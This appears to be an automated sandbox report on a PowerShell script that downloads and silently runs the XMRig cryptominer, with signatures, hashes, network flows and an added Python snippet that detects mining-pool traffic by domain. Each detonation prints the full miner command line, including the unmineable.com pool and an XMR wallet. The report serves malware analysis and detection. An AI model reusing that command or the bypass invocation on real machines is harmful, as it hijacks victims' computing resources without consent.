Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Network

N/A

Files

memory/2904-4-0x000007FEF587E000-0x000007FEF587F000-memory.dmp

memory/2904-5-0x000000001B390000-0x000000001B672000-memory.dmp

memory/2904-6-0x0000000002220000-0x0000000002228000-memory.dmp

memory/2904-7-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-8-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-9-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-10-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-11-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2904-12-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:12

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1741s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits recorded, none with a description, indicator, process or target)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

memory/1116-0-0x00007FFFF6303000-0x00007FFFF6305000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_li1vm1fz.sbo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1116-9-0x0000024B51300000-0x0000024B51322000-memory.dmp

memory/1116-10-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/1116-11-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/1116-12-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/1116-14-0x0000024B51810000-0x0000024B51822000-memory.dmp

memory/1116-15-0x0000024B51490000-0x0000024B5149A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2956-46-0x0000026AC5F70000-0x0000026AC5F90000-memory.dmp

memory/2956-47-0x0000026AC7870000-0x0000026AC7890000-memory.dmp

memory/2956-48-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/1116-49-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/1116-50-0x00007FFFF6303000-0x00007FFFF6305000-memory.dmp

memory/1116-51-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/2956-53-0x0000026AC78B0000-0x0000026AC78D0000-memory.dmp

memory/2956-52-0x0000026AC7890000-0x0000026AC78B0000-memory.dmp

memory/2956-54-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-55-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-56-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-57-0x0000026AC7890000-0x0000026AC78B0000-memory.dmp

memory/2956-58-0x0000026AC78B0000-0x0000026AC78D0000-memory.dmp

memory/2956-59-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-60 through memory/2956-117: 58 further dumps of the same region, 0x00007FF626B40000-0x00007FF627773000

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:13

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits recorded, none with a description, indicator, process or target)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/4496-0-0x00007FFE71AD3000-0x00007FFE71AD5000-memory.dmp

memory/4496-1-0x000002467FAB0000-0x000002467FAD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l2evhgln.1gz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4496-11-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/4496-12-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/4496-14-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/4496-15-0x000002467FA80000-0x000002467FA92000-memory.dmp

memory/4496-16-0x000002467E170000-0x000002467E17A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5096-47-0x0000015C56A90000-0x0000015C56AB0000-memory.dmp

memory/5096-48-0x0000015C56E00000-0x0000015C56E20000-memory.dmp

memory/5096-49-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-50-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/4496-52-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/4496-51-0x00007FFE71AD3000-0x00007FFE71AD5000-memory.dmp

memory/5096-54-0x0000015CEB190000-0x0000015CEB1B0000-memory.dmp

memory/5096-53-0x0000015CEAF60000-0x0000015CEAF80000-memory.dmp

memory/5096-55-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/4496-56-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/5096-57-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-59-0x0000015CEB190000-0x0000015CEB1B0000-memory.dmp

memory/5096-58-0x0000015CEAF60000-0x0000015CEAF80000-memory.dmp

memory/5096-60-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-61 through memory/5096-118: 58 further dumps of the same region, 0x00007FF72ECC0000-0x00007FF72F8F3000

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:56

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits recorded, none with a description, indicator, process or target)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.19:443 tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
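
The network table above shows why port-based egress rules miss this miner: the pool session to rx.unmineable.com runs stratum over TLS on 443, indistinguishable by port from the GitHub download and the Bing background traffic. The block below is an added example, not part of the report: it parses the rows as copied from this table, keeps the one with no recorded domain, collapses the repeated Bing rows, flags pool sessions by domain rather than port, and checks that a fetch from GitHub precedes the first pool connection. The pool watchlist, the download-host list, the set of classic stratum ports and the assumption that rows are in capture order are all mine, not facts stated by the report.

```python
"""Added example (not part of the report): classify the behavioral8 Network
rows by domain, since the pool session uses 443 like everything else."""
from collections import namedtuple

Flow = namedtuple("Flow", "country ip port domain proto")

# Rows copied verbatim from the behavioral8 Network table (one has no domain).
NETWORK_ROWS = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.19:443 tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
"""

# Assumed watchlist of pool domains; the report only evidences unmineable.com.
POOL_DOMAIN_SUFFIXES = ("unmineable.com",)
# Assumed list of hosts a loader fetches the miner from; the report evidences these two.
DOWNLOAD_HOSTS = ("github.com", "objects.githubusercontent.com")
# Assumed set of classic stratum ports that a naive firewall rule would block.
CLASSIC_STRATUM_PORTS = {3333, 4444, 5555, 7777, 14444}


def parse_rows(text: str) -> list:
    """Parse 'Country Destination [Domain] Proto' rows; a missing domain becomes ''."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:                      # no name recorded for this destination
            country, dest, proto = parts
            domain = ""
        else:
            continue                               # header or blank line
        ip, _, port = dest.rpartition(":")
        flows.append(Flow(country, ip, int(port), domain, proto))
    return flows


def unique_destinations(flows: list) -> list:
    """Collapse repeated rows (sandbox noise such as the five Bing sessions)."""
    return sorted({(f.ip, f.port, f.domain, f.proto) for f in flows})


def is_pool_domain(domain: str) -> bool:
    """Match the domain itself or any subdomain of a watchlisted pool."""
    d = domain.lower()
    return any(d == s or d.endswith("." + s) for s in POOL_DOMAIN_SUFFIXES)


def mining_sessions(flows: list) -> list:
    """TCP flows to a pool domain, whatever the port (here it is 443)."""
    return [f for f in flows if f.proto == "tcp" and is_pool_domain(f.domain)]


def port_rule_would_miss(flows: list) -> list:
    """Pool sessions that a block-list of classic stratum ports would let through."""
    return [f for f in mining_sessions(flows) if f.port not in CLASSIC_STRATUM_PORTS]


def download_then_mine(flows: list) -> bool:
    """True if a TCP fetch from a download host precedes the first pool session.

    Assumes the rows are in capture order, as they appear in the report."""
    first_fetch = next((i for i, f in enumerate(flows)
                        if f.proto == "tcp" and f.domain in DOWNLOAD_HOSTS), None)
    first_pool = next((i for i, f in enumerate(flows)
                       if f.proto == "tcp" and is_pool_domain(f.domain)), None)
    return first_fetch is not None and first_pool is not None and first_fetch < first_pool


if __name__ == "__main__":
    flows = parse_rows(NETWORK_ROWS)
    for f in mining_sessions(flows):
        print(f"pool session: {f.domain} {f.ip}:{f.port} ({f.country})")
    print("download-then-mine pattern:", download_then_mine(flows))
```

Matching on the resolved name (or the TLS SNI, which carries the same string) is what makes the rule portable: rx.unmineable.com would still be caught if the operator moved the pool to 3333, and 443 stays open for the GitHub and Bing traffic the sandbox also recorded.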

Files

memory/4968-0-0x00007FFACD433000-0x00007FFACD435000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ir2gzmux.uxe.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4968-9-0x0000023B6FCF0000-0x0000023B6FD12000-memory.dmp

memory/4968-10-0x00007FFACD430000-0x00007FFACDEF2000-memory.dmp

memory/4968-11-0x00007FFACD430000-0x00007FFACDEF2000-memory.dmp

memory/4968-12-0x00007FFACD430000-0x00007FFACDEF2000-memory.dmp

memory/4968-15-0x0000023B700E0000-0x0000023B700EA000-memory.dmp

memory/4968-14-0x0000023B70200000-0x0000023B70212000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2448-46-0x000001EB42010000-0x000001EB42030000-memory.dmp

memory/2448-47-0x000001EB43820000-0x000001EB43840000-memory.dmp

memory/2448-48-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/4968-49-0x00007FFACD430000-0x00007FFACDEF2000-memory.dmp

memory/2448-51-0x000001EB43840000-0x000001EB43860000-memory.dmp

memory/2448-50-0x000001EBD6400000-0x000001EBD6420000-memory.dmp

memory/4968-53-0x00007FFACD433000-0x00007FFACD435000-memory.dmp

memory/2448-52-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:59

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1771s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

memory/3332-0-0x00007FFAA59E3000-0x00007FFAA59E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_53j0tgru.0iu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3332-6-0x000001C2A0920000-0x000001C2A0942000-memory.dmp

memory/3332-11-0x00007FFAA59E0000-0x00007FFAA64A1000-memory.dmp

memory/3332-12-0x00007FFAA59E0000-0x00007FFAA64A1000-memory.dmp

memory/3332-14-0x00007FFAA59E0000-0x00007FFAA64A1000-memory.dmp

memory/3332-15-0x000001C2B9B90000-0x000001C2B9BA2000-memory.dmp

memory/3332-16-0x000001C2A0780000-0x000001C2A078A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4016-47-0x0000026D147B0000-0x0000026D147D0000-memory.dmp

memory/4016-48-0x0000026D161D0000-0x0000026D161F0000-memory.dmp

memory/4016-49-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/4016-50-0x00007FF791490000-0x00007FF7920C3000-memory.dmp

memory/3332-51-0x00007FFAA59E3000-0x00007FFAA59E5000-memory.dmp

memory/3332-52-0x00007FFAA59E0000-0x00007FFAA64A1000-memory.dmp

memory/4016-54-0x0000026D16210000-0x0000026D16230000-memory.dmp

memory/4016-53-0x0000026D161F0000-0x0000026D16210000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:05

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
